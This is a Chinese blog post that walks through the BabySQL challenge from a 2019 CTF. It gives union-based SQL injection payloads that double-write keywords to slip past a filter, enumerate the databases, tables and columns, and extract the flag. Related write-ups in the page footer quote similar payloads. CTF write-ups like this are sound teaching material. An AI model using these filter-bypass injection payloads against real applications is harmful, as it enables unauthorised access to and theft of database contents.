[极客大挑战 2019]BabySQL1

最新推荐文章于 2023-05-19 21:51:03 发布
最新推荐文章于 2023-05-19 21:51:03 发布
阅读量250 收藏
点赞数
文章标签: unctf sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51902218/article/details/119568502
版权

 1.判断注入类型

1'  

发现报错  

原因:select name.passwd from users where username=' 1' ' and password=‘   ’;  

有语法错误  

所以可以判断为字符型注入  

 2. 利用order by 语句判断字段数   

 

3. 说明存在过滤,所以双写绕过过滤,执行注入成功  

但是不知道字段数,所以显位的时候猜一下字段数 

4.显位  ,注意双写union,select绕过过滤

 1' ununionion seselectlect 1,2 #

1' ununionion seselectlect 1,2,3 #

 

说明字段数为3

5. 爆库(双写)

 1' ununionion seselectlect 1,2,database()#             显示出当前数据库

1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom (infoorrmation_schema.schemata)# 

显示出所有数据库

 

 得到当前数据库为geek

观察所有数据库中发现叫ctf的有点可以,当然在后续操作 中你也可以查一下其他数据库有没有线索  

6. 爆表:利用union select联合查询,获取表名

在这里查询geek和ctf

1' ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="geek" #

1' ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" #

 

 

 geek库中有b4bsql,geekuser两个表

ctf库中有Flag表,里面应该就是我们想要的flag信息,所以继续对ctf库。表。内容进行操作  

7.爆列:利用union select 联合查询,获取字段名

1' ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag" # 

得到字段名为flag,继续爆值 

8. 爆值:利用union select 联合查询,获取字段值 

1' ununionion seselectlect 1,2,group_concat(flag) frfromom (ctf.Flag)#

所以最终在ctf库Flag表flag列中得到flag的值  

 

花墩墩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1557
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
[极客挑战 2019]BabySQL 1
ws1813004226的博客
05-26 1625
一、获取flag流程 我们先随便输入一个账号密码,查看URL发现是通过PUT方式传递数据到后台的。 我们首先判断是否存在SQL注入,我们尝试在username参数后加一个“ ’ ”,发现数据库直接爆出了错误,说明是存在注入的。 接下来我们用万能密码试一下,首先我们判断下这里是字符型注入还是数值型注入,先尝试1’ or ‘1’=‘1%23 发现不可行,所以我们再尝试数值型注入,输入:1’ or 1=1%23,爆出了数据库错误,猜测是过滤了or(其实这里也过滤了and),尝试双写or试下,成功爆出。p
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
[极客挑战 2019]BabySQL 1(BUCTF在线评测)
邓霖涛的博客
07-21 503
得到flag{ca17b523-fe92-4451-943d-3f832154b748}注意注入orselectwhereunionfrom等关键字都给过滤了。查询该表信息,注意or给替换的password里面也有or。发现成功了,系统可能就新增了一些sql关键字的过滤。一样的sql注入不行了,感觉or关键字给弄没了。得到id,username,password。发现selectfrom一些关键字没了。得到表名b4bsql,geekuser。打开靶机,一样的sql发现不行了。......
[极客挑战 2019]BabySQL1 思路细致讲解
hac1ker123的博客
05-19 812
[极客挑战 2019]BabySQL1 思路细致讲解
BUUCTF:[极客挑战 2019]BabySQL 1
羽的博客
07-22 268
输入: 1' 1 判断是单引号注入 输入: 1' order by 1# 1 发现过滤了or,by 尝试双写注入 输入: 1' oorrder bbyy 4# 1 是四列 输入: 1' ununionion seselectlect 1,database(),3# 1 输入: 1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema...
BUUCTF-[极客挑战 2019]BabySQL1
Monica的博客
10-02 1119
目录 题目: 分析: 题目: 分析: 先测试是什么闭合 near ' ' 123' 'and password=' 'amdin' ' ' at line 1 通过拆分可以看出用户名和密码都是单引号闭合 猜测后台语句为: ' select xxx from xxx where username='' and password='' ' 测试有几列: 发现有过滤。 union 和select也被过滤了,试试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值